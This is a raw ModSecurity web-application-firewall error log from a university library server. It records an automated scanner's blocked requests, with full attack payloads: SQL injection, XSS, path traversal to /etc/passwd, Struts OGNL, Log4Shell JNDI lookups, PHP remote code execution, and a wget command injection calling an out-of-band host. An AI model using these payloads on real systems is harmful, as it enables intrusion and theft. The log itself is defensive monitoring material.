[Tue Aug 29 08:55:48.380727 2023] [:error] [pid 62660] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HORNGREN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1QJMCo-f0AAPTETpUAAAAI"]
[Tue Aug 29 10:32:28.650593 2023] [:error] [pid 64860] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Customer experience\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1mzMCo-f0AAP1crV0AAAAF"]
[Tue Aug 29 11:20:39.595516 2023] [:error] [pid 611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1yF8Co-f0AAAJjrWUAAAAK"]
[Tue Aug 29 11:20:44.601928 2023] [:error] [pid 723] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1yHMCo-f0AAALTAbIAAAAF"]
[Tue Aug 29 11:30:10.879324 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10UsCo-f0AAAOYZhEAAAAB"]
[Tue Aug 29 11:30:11.022903 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAO-1nQAAAAI"]
[Tue Aug 29 11:30:11.858699 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAAPDnukAAAAP"]
[Tue Aug 29 11:30:12.686126 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPLwA0AAAAX"]
[Tue Aug 29 11:30:13.324898 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPENZ4AAAAQ"]
[Tue Aug 29 11:30:13.398096 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAPRNW8AAAAf"]
[Tue Aug 29 11:30:15.335114 2023] [:error] [pid 965] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPFPf4AAAAR"]
[Tue Aug 29 11:30:15.350246 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAOKNlwAAAAK"]
[Tue Aug 29 11:30:16.320767 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlg1c5cyrdewko1t.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlg1c5cyrdewko1t.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlg1c5cyrdewko1t.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPQkeMAAAAe"]
[Tue Aug 29 11:30:17.388855 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPXAiUAAAAi"]
[Tue Aug 29 11:30:19.665579 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPRNZAAAAAf"]
[Tue Aug 29 11:30:20.590459 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAOGafAAAAAS"]
[Tue Aug 29 11:30:21.307058 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XcCo-f0AAAOH4R0AAAAH"]
[Tue Aug 29 11:30:22.619700 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlg9jiiqmssrqnzb.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPfm68AAAAR"]
[Tue Aug 29 11:30:23.320183 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAOOuTgAAAAW"]
[Tue Aug 29 11:30:23.335387 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPahvEAAAAL"]
[Tue Aug 29 11:30:24.352290 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPMl@8AAAAY"]
[Tue Aug 29 11:30:24.364956 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAANjpxMAAAAT"]
[Tue Aug 29 11:30:25.307932 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPOhYMAAAAa"]
[Tue Aug 29 11:30:25.407697 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgd84zpp7zdz9xh.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOIvT0AAAAM"]
[Tue Aug 29 11:30:25.602895 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YcCo-f0AAAOIvT4AAAAM"]
[Tue Aug 29 11:30:27.501388 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAANjpxsAAAAT"]
[Tue Aug 29 11:30:27.511722 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAANjpxsAAAAT"]
[Tue Aug 29 11:30:28.318883 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPMl-kAAAAY"]
[Tue Aug 29 11:30:29.393997 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAPNBSUAAAAZ"]
[Tue Aug 29 11:30:30.512463 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPPSvoAAAAd"]
[Tue Aug 29 11:30:30.531150 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAPiBfgAAAAB"]
